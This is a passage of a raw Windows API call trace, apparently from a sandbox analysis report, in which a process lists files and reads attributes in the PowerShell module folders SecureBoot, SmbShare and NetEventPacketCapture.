lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0226.605] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", lpFilePart=0x0) returned 0x49 [0226.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.609] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0226.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.609] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0226.609] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", lpFilePart=0x0) returned 0x49 [0226.637] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot", lpFilePart=0x0) returned 0x3d [0226.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.637] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\secureboot"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.638] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot", lpFilePart=0x0) returned 0x3d [0226.638] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\", lpFilePart=0x0) returned 0x3e [0226.638] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf7f0 [0226.638] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.638] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe921041, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.639] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a0b9cd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x15a0b9cd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x15a0b9cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot.psd1", cAlternateFileName="")) returned 1 [0226.639] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a0b9cd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x15a0b9cd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x15a0b9cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot.psd1", cAlternateFileName="")) returned 0 [0226.639] FindClose (in: hFindFile=0x1a5cf7f0 | out: hFindFile=0x1a5cf7f0) returned 1 [0226.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.639] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\secureboot\\secureboot.psd1")) returned 0x20 [0226.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.642] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", lpFilePart=0x0) returned 0x3b [0226.642] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", lpFilePart=0x0) returned 0x3c [0226.642] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.642] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.642] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe921041, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.643] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcca7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.format.ps1xml", cAlternateFileName="")) returned 1 [0226.643] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x495a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.types.ps1xml", cAlternateFileName="")) returned 1 [0226.643] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbBandwidthLimit.cdxml", cAlternateFileName="")) returned 1 [0226.643] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f87, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientConfiguration.cdxml", cAlternateFileName="")) returned 1 [0226.643] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0226.643] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x881, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbConnection.cdxml", cAlternateFileName="")) returned 1 [0226.644] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMapping.cdxml", cAlternateFileName="")) returned 1 [0226.644] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConnection.cdxml", cAlternateFileName="")) returned 1 [0226.644] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1cc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConstraint.cdxml", cAlternateFileName="")) returned 1 [0226.644] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1dd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbOpenFile.cdxml", cAlternateFileName="")) returned 1 [0226.644] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1391, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbScriptModule.psm1", cAlternateFileName="")) returned 1 [0226.644] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerConfiguration.cdxml", cAlternateFileName="")) returned 1 [0226.645] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0226.645] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbSession.cdxml", cAlternateFileName="")) returned 1 [0226.645] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.cdxml", cAlternateFileName="")) returned 1 [0226.645] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0226.645] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 1 [0226.646] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 0 [0226.646] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.646] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", lpFilePart=0x0) returned 0x3b [0226.646] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", lpFilePart=0x0) returned 0x3c [0226.646] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.646] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.646] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe921041, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.647] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcca7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.format.ps1xml", cAlternateFileName="")) returned 1 [0226.647] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x495a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.types.ps1xml", cAlternateFileName="")) returned 1 [0226.647] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbBandwidthLimit.cdxml", cAlternateFileName="")) returned 1 [0226.647] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f87, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientConfiguration.cdxml", cAlternateFileName="")) returned 1 [0226.647] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0226.647] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x881, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbConnection.cdxml", cAlternateFileName="")) returned 1 [0226.648] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, 